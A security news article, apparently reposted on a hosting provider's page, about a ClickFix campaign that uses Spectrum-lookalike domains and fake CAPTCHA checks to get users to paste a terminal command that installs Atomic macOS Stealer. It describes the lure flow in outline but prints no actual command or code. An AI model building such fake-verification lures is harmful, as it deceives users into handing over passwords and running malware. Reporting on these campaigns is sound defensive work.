Cybersecurity researchers have raised alarms over a dangerous new malware campaign that uses social engineering tactics to deploy an information-stealing malware known as Atomic macOS Stealer (AMOS) on Apple macOS systems. This campaign, identified by CloudSEK, utilizes typosquatted domains that imitate the U.S.-based telecom provider Spectrum.

Users looking to access these domains are presented with a malicious shell script, designed to steal system passwords. This script not only captures credentials but also downloads a variant of AMOS for further exploitation. Koushik Pal, a security researcher, commented on the malicious approach, highlighting that the script employs native macOS commands to circumvent security features and execute harmful binaries.

Investigations indicated that Russian-speaking cybercriminals are implicated in this operation, as noted by the inclusion of Russian comments found within the malware’s source code.

The attack begins with a deceptive web page that impersonates Spectrum, with URLs such as "panel-spectrum.net" or "spectrum-ticket.net." Users are prompted to complete a hCaptcha verification check under the pretense of reviewing their connection’s security. However, when they attempt to click the "I am human" checkbox, they’re met with an error message prompting them to pursue an "Alternative Verification."

This misleading interaction leads to a command being copied to the user’s clipboard, which instructs them to execute a terminal command on macOS or a PowerShell command on Windows. Once the script runs, it requests the user’s system password and downloads the next-stage payload, facilitating access to Atomic Stealer.

Pal noted that the delivery sites exhibited poor programming, presenting mismatched instructions that suggested the infrastructure was hastily put together. This inconsistency included Linux user agents receiving PowerShell commands and identical instructions for both Windows and Mac users.

The disclosure of this attack arrives amidst an upward trend in ClickFix tactics for delivering various malware strains over the past year. Darktrace, a cybersecurity firm, reported that actors engaged in these targeted attacks tend to use similar techniques to gain initial access, which includes spear phishing and exploiting trust in familiar platforms to deliver harmful payloads.

ClickFix campaigns typically redirect users to malicious URLs disguised with fake CAPTCHA verification checks. This manipulation convinces users they are merely addressing a harmless security measure, inadvertently leading them to execute harmful commands.

CloudSEK documented multiple ClickFix incidents across various regions, including Europe, the Middle East, Africa, and North America, with these campaigns becoming increasingly prevalent and showcasing diverse methods to deliver malware.

Recently, an email phishing campaign reported by Cofense may have targeted hotel chains and the food industry, employing spoofed Booking.com messages that linked to fake CAPTCHA sites. This opportunistic use of ClickFix tactics underscores its adaptable nature for malware distribution across various sectors.

As users become accustomed to frequent security prompts and captcha checks, they may be more likely to comply quickly, which threat actors exploit by engineering straightforward steps that blend into everyday online behavior, ultimately compromising their systems.

Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.